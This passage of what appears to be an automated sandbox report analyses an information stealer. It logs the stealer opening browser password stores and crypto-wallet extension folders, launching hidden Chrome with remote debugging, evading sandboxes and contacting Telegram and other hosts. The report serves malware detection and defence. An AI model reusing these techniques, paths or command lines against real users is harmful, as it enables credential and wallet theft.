                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformationJump to behavior
                    Source: C:\Windows\System32\dxdiag.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0516~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\dxdiag.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0110~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\dxdiag.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0110~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12CD010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_00007FF7E12CD010
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeCode function: 7_2_00007FF7E12E5C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,7_2_00007FF7E12E5C00
                    Source: C:\Windows\System32\dxdiag.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OllyDbg.exe
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Wireshark.exe
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: ollydbg.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 2.2.skotes.exe.7a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.6c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.skotes.exe.7a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.2152067719.00000000007A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2104456781.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2063442890.0000000005110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2148194212.00000000007A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.2662182646.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000003.2111686046.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.2104419686.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: samat.exe PID: 6120, type: MEMORYSTR
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfndJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.dbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\khpkpbbcccdmmclmpigdgddabeilkdpdJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbhJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpnJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mdjmfdffdcmnoblignmgpommbefadffdJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieafJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.dbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiiooljJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfkJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibgJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnkJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior

                    Remote Access Functionality

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                    Source: Yara matchFile source: 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: samat.exe PID: 6120, type: MEMORYSTR
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
                    Windows Management Instrumentation
                    1
                    LSASS Driver
                    1
                    LSASS Driver
                    1
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Web Service
                    Exfiltration Over Other Network Medium1
                    Data Encrypted for Impact
                    CredentialsDomainsDefault Accounts2
                    Native API
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    2
                    File and Directory Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    1
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    Command and Scripting Interpreter
                    1
                    Scheduled Task/Job
                    1
                    Extra Window Memory Injection
                    3
                    Obfuscated Files or Information
                    Security Account Manager357
                    System Information Discovery
                    SMB/Windows Admin Shares1
                    Input Capture
                    21
                    Encrypted Channel
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts1
                    Scheduled Task/Job
                    Login Hook12
                    Process Injection
                    1
                    Install Root Certificate
                    NTDS11101
                    Security Software Discovery
                    Distributed Component Object ModelInput Capture1
                    Remote Access Software
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                    Scheduled Task/Job
                    12
                    Software Packing
                    LSA Secrets2
                    Process Discovery
                    SSHKeylogging3
                    Non-Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Timestomp
                    Cached Domain Credentials481
                    Virtualization/Sandbox Evasion
                    VNCGUI Input Capture14
                    Application Layer Protocol
                    Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading
                    DCSync1
                    Application Window Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Extra Window Memory Injection
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                    Masquerading
                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron481
                    Virtualization/Sandbox Evasion
                    Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                    Process Injection
                    Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560508 Sample: file.exe Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 86 api.telegram.org 2->86 88 thedotmediagroup.com 2->88 90 10 other IPs or domains 2->90 118 Suricata IDS alerts for network traffic 2->118 120 Found malware configuration 2->120 122 Malicious sample detected (through community Yara rule) 2->122 126 11 other signatures 2->126 10 skotes.exe 19 2->10         started        15 file.exe 5 2->15         started        17 skotes.exe 2->17         started        19 7 other processes 2->19 signatures3 124 Uses the Telegram API (likely for C&C communication) 86->124 process4 dnsIp5 98 185.215.113.43, 49812, 49818, 49823 WHOLESALECONNECTIONSNL Portugal 10->98 100 thedotmediagroup.com 188.165.52.14, 443, 49824 OVHFR France 10->100 78 C:\Users\user\AppData\Local\...\samat.exe, PE32+ 10->78 dropped 80 C:\Users\user\AppData\Local\...\samat[1].exe, PE32+ 10->80 dropped 146 Hides threads from debuggers 10->146 148 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->148 150 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 10->150 21 samat.exe 106 10->21         started        82 C:\Users\user\AppData\Local\...\skotes.exe, PE32 15->82 dropped 84 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 15->84 dropped 152 Detected unpacking (changes PE section rights) 15->152 154 Tries to evade debugger and weak emulator (self modifying code) 15->154 156 Tries to detect virtualization through RDTSC time measurements 15->156 25 skotes.exe 15->25         started        102 127.0.0.1 unknown unknown 19->102 27 msedge.exe 19->27         started        30 msedge.exe 19->30         started        32 msedge.exe 19->32         started        34 2 other processes 19->34 file6 signatures7 process8 dnsIp9 68 C:\Users\user\AppData\...\win32crypt.pyd, PE32+ 21->68 dropped 70 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 21->70 dropped 72 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 21->72 dropped 74 67 other malicious files 21->74 dropped 128 Multi AV Scanner detection for dropped file 21->128 130 Attempt to bypass Chrome Application-Bound Encryption 21->130 132 Found pyInstaller with non standard icon 21->132 36 samat.exe 12 21->36         started        134 Detected unpacking (changes PE section rights) 25->134 136 Tries to detect sandboxes and other dynamic analysis tools (window names) 25->136 138 Tries to evade debugger and weak emulator (self modifying code) 25->138 140 3 other signatures 25->140 104 13.91.222.61, 443, 50031, 50041 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 27->104 106 20.110.205.119, 443, 50020, 50195 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 27->106 108 13 other IPs or domains 27->108 file10 signatures11 process12 dnsIp13 92 api.telegram.org 149.154.167.220, 443, 50152, 50154 TELEGRAMRU United Kingdom 36->92 94 api.myip.com 172.67.75.163, 443, 49896 CLOUDFLARENETUS United States 36->94 76 C:\Users\user\AppData\Local\...\passwords.db, SQLite 36->76 dropped 142 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 36->142 144 Tries to harvest and steal browser information (history, passwords, etc) 36->144 41 cmd.exe 1 36->41         started        43 chrome.exe 36->43         started        46 taskkill.exe 36->46         started        48 16 other processes 36->48 file14 signatures15 process16 dnsIp17 50 dxdiag.exe 41->50         started        53 conhost.exe 41->53         started        110 239.255.255.250 unknown Reserved 43->110 55 chrome.exe 43->55         started        58 conhost.exe 46->58         started        60 conhost.exe 48->60         started        62 msedge.exe 48->62         started        64 conhost.exe 48->64         started        66 12 other processes 48->66 process18 dnsIp19 112 Query firmware table information (likely to detect VMs) 50->112 114 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 50->114 116 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 50->116 96 www.google.com 142.250.181.100, 443, 49942, 49944 GOOGLEUS United States 55->96 signatures20

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    file.exe47%ReversingLabsWin32.Packed.Themida
                    file.exe100%AviraTR/Crypt.TPM.Gen
                    file.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\samat[1].exe13%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\1008029001\samat.exe13%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_ARC4.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_Salsa20.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_chacha20.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_pkcs1_decode.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_aes.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_aesni.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_arc2.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_blowfish.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cast.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cbc.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_cfb.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ctr.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_des3.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ecb.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_eksblowfish.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ocb.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher\_raw_ofb.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2b.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_BLAKE2s.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD2.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD4.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_MD5.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_RIPEMD160.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA1.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA224.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA256.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA384.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_SHA512.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_clmul.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_ghash_portable.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_keccak.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash\_poly1305.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Math\_modexp.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Protocol\_scrypt.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve25519.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_curve448.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ec_ws.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed25519.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey\_ed448.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_cpuid_c.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util\_strxor.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\VCRUNTIME140.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\VCRUNTIME140_1.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\_asyncio.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\_bz2.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\_cffi_backend.cp313-win_amd64.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\_ctypes.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\_decimal.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\_hashlib.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\_lzma.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\_multiprocessing.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\_overlapped.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\_queue.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\_socket.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\_sqlite3.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\_ssl.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\_wmi.pyd0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md.cp313-win_amd64.pyd0%ReversingLabs
